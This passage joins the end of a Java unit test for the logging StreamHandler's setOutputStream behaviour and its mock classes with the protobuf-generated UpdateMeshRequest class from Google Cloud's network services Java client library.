"testSetOutputStream_Normal"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal", aos .toString()); ByteArrayOutputStream aos2 = new ByteArrayOutputStream(); h.setOutputStream(aos2); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); r = new LogRecord(Level.INFO, "testSetOutputStream_Normal2"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal2", aos2 .toString()); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); } /* * Test setOutputStream() after close. */ public void testSetOutputStream_AfterClose() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); MockStreamHandler h = new MockStreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "testSetOutputStream_Normal"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal", aos .toString()); h.close(); ByteArrayOutputStream aos2 = new ByteArrayOutputStream(); h.setOutputStream(aos2); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); r = new LogRecord(Level.INFO, "testSetOutputStream_Normal2"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal2", aos2 .toString()); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); } /* * Test setOutputStream() when having insufficient privilege. */ public void testSetOutputStream_InsufficientPrivilege() { MockStreamHandler h = new MockStreamHandler(); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); try { h.setOutputStream(new ByteArrayOutputStream()); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } h = new MockStreamHandler(); System.setSecurityManager(new MockSecurityManager()); try { h.setOutputStream(null); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } finally { System.setSecurityManager(oldMan); } } /* * A mock stream handler, expose setOutputStream. */ public static class MockStreamHandler extends StreamHandler { public MockStreamHandler() { super(); } public MockStreamHandler(OutputStream out, Formatter formatter) { super(out, formatter); } public void setOutputStream(OutputStream out) { super.setOutputStream(out); } public boolean isLoggable(LogRecord r) { CallVerificationStack.getInstance().push(r); return super.isLoggable(r); } } /* * A mock filter, always return false. */ public static class MockFilter implements Filter { public boolean isLoggable(LogRecord record) { CallVerificationStack.getInstance().push(record); return false; } } /* * A mock formatter. */ public static class MockFormatter extends java.util.logging.Formatter { public String format(LogRecord r) { // System.out.println("formatter called..."); return super.formatMessage(r); } /* * (non-Javadoc) * * @see java.util.logging.Formatter#getHead(java.util.logging.Handler) */ public String getHead(Handler h) { return "MockFormatter_Head"; } /* * (non-Javadoc) * * @see java.util.logging.Formatter#getTail(java.util.logging.Handler) */ public String getTail(Handler h) { return "MockFormatter_Tail"; } } /* * Another mock formatter. */ public static class MockFormatter2 extends java.util.logging.Formatter { public String format(LogRecord r) { // System.out.println("formatter2 called..."); return r.getMessage(); } } /* * A mock output stream. */ public static class MockOutputStream extends ByteArrayOutputStream { /* * (non-Javadoc) * * @see java.io.OutputStream#close() */ public void close() throws IOException { CallVerificationStack.getInstance().push(null); super.close(); } /* * (non-Javadoc) * * @see java.io.OutputStream#flush() */ public void flush() throws IOException { CallVerificationStack.getInstance().push(null); super.flush(); } /* * (non-Javadoc) * * @see java.io.OutputStream#write(int) */ public void write(int oneByte) { // TODO Auto-generated method stub super.write(oneByte); } } /* * A mock output stream that always throw exception. */ public static class MockExceptionOutputStream extends ByteArrayOutputStream { /* * (non-Javadoc) * * @see java.io.OutputStream#close() */ public void close() throws IOException { throw new IOException(); } /* * (non-Javadoc) * * @see java.io.OutputStream#flush() */ public void flush() throws IOException { throw new IOException(); } /* * (non-Javadoc) * * @see java.io.OutputStream#write(byte[], int, int) */ public synchronized void write(byte[] buffer, int offset, int count) { throw new NullPointerException(); } /* * (non-Javadoc) * * @see java.io.OutputStream#write(int) */ public synchronized void write(int oneByte) { throw new NullPointerException(); } } /* * Used to grant all permissions except logging control. */ public static class MockSecurityManager extends SecurityManager { public MockSecurityManager() { } public void checkPermission(Permission perm) { // grant all permissions except logging control if (perm instanceof LoggingPermission) { throw new SecurityException(); } } public void checkPermission(Permission perm, Object context) { // grant all permissions except logging control if (perm instanceof LoggingPermission) { throw new SecurityException(); } } } }
googleapis/google-cloud-java
35,842
java-networkservices/proto-google-cloud-networkservices-v1/src/main/java/com/google/cloud/networkservices/v1/UpdateMeshRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/networkservices/v1/mesh.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.networkservices.v1; /** * * * <pre> * Request used by the UpdateMesh method. * </pre> * * Protobuf type {@code google.cloud.networkservices.v1.UpdateMeshRequest} */ public final class UpdateMeshRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.networkservices.v1.UpdateMeshRequest) UpdateMeshRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdateMeshRequest.newBuilder() to construct. private UpdateMeshRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdateMeshRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdateMeshRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkservices.v1.UpdateMeshRequest.class, com.google.cloud.networkservices.v1.UpdateMeshRequest.Builder.class); } private int bitField0_; public static final int UPDATE_MASK_FIELD_NUMBER = 1; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int MESH_FIELD_NUMBER = 2; private com.google.cloud.networkservices.v1.Mesh mesh_; /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code>.google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the mesh field is set. */ @java.lang.Override public boolean hasMesh() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code>.google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The mesh. */ @java.lang.Override public com.google.cloud.networkservices.v1.Mesh getMesh() { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code>.google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.networkservices.v1.MeshOrBuilder getMeshOrBuilder() { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getUpdateMask()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getMesh()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getUpdateMask()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getMesh()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.networkservices.v1.UpdateMeshRequest)) { return super.equals(obj); } com.google.cloud.networkservices.v1.UpdateMeshRequest other = (com.google.cloud.networkservices.v1.UpdateMeshRequest) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } if (hasMesh() != other.hasMesh()) return false; if (hasMesh()) { if (!getMesh().equals(other.getMesh())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } if (hasMesh()) { hash = (37 * hash) + MESH_FIELD_NUMBER; hash = (53 * hash) + getMesh().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.networkservices.v1.UpdateMeshRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request used by the UpdateMesh method. * </pre> * * Protobuf type {@code google.cloud.networkservices.v1.UpdateMeshRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.networkservices.v1.UpdateMeshRequest) com.google.cloud.networkservices.v1.UpdateMeshRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkservices.v1.UpdateMeshRequest.class, com.google.cloud.networkservices.v1.UpdateMeshRequest.Builder.class); } // Construct using com.google.cloud.networkservices.v1.UpdateMeshRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); getMeshFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } mesh_ = null; if (meshBuilder_ != null) { meshBuilder_.dispose(); meshBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_descriptor; } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest getDefaultInstanceForType() { return com.google.cloud.networkservices.v1.UpdateMeshRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest build() { com.google.cloud.networkservices.v1.UpdateMeshRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest buildPartial() { com.google.cloud.networkservices.v1.UpdateMeshRequest result = new com.google.cloud.networkservices.v1.UpdateMeshRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.networkservices.v1.UpdateMeshRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.mesh_ = meshBuilder_ == null ? mesh_ : meshBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.networkservices.v1.UpdateMeshRequest) { return mergeFrom((com.google.cloud.networkservices.v1.UpdateMeshRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.networkservices.v1.UpdateMeshRequest other) { if (other == com.google.cloud.networkservices.v1.UpdateMeshRequest.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } if (other.hasMesh()) { mergeMesh(other.getMesh()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getMeshFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.cloud.networkservices.v1.Mesh mesh_; private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.networkservices.v1.Mesh, com.google.cloud.networkservices.v1.Mesh.Builder, com.google.cloud.networkservices.v1.MeshOrBuilder> meshBuilder_; /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the mesh field is set. */ public boolean hasMesh() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The mesh. */ public com.google.cloud.networkservices.v1.Mesh getMesh() { if (meshBuilder_ == null) { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } else { return meshBuilder_.getMessage(); } } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setMesh(com.google.cloud.networkservices.v1.Mesh value) { if (meshBuilder_ == null) { if (value == null) { throw new NullPointerException(); } mesh_ = value; } else { meshBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setMesh(com.google.cloud.networkservices.v1.Mesh.Builder builderForValue) { if (meshBuilder_ == null) { mesh_ = builderForValue.build(); } else { meshBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeMesh(com.google.cloud.networkservices.v1.Mesh value) { if (meshBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && mesh_ != null && mesh_ != com.google.cloud.networkservices.v1.Mesh.getDefaultInstance()) { getMeshBuilder().mergeFrom(value); } else { mesh_ = value; } } else { meshBuilder_.mergeFrom(value); } if (mesh_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearMesh() { bitField0_ = (bitField0_ & ~0x00000002); mesh_ = null; if (meshBuilder_ != null) { meshBuilder_.dispose(); meshBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.networkservices.v1.Mesh.Builder getMeshBuilder() { bitField0_ |= 0x00000002; onChanged(); return getMeshFieldBuilder().getBuilder(); } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.networkservices.v1.MeshOrBuilder getMeshOrBuilder() { if (meshBuilder_ != null) { return meshBuilder_.getMessageOrBuilder(); } else { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.networkservices.v1.Mesh, com.google.cloud.networkservices.v1.Mesh.Builder, com.google.cloud.networkservices.v1.MeshOrBuilder> getMeshFieldBuilder() { if (meshBuilder_ == null) { meshBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.networkservices.v1.Mesh, com.google.cloud.networkservices.v1.Mesh.Builder, com.google.cloud.networkservices.v1.MeshOrBuilder>( getMesh(), getParentForChildren(), isClean()); mesh_ = null; } return meshBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.networkservices.v1.UpdateMeshRequest) } // 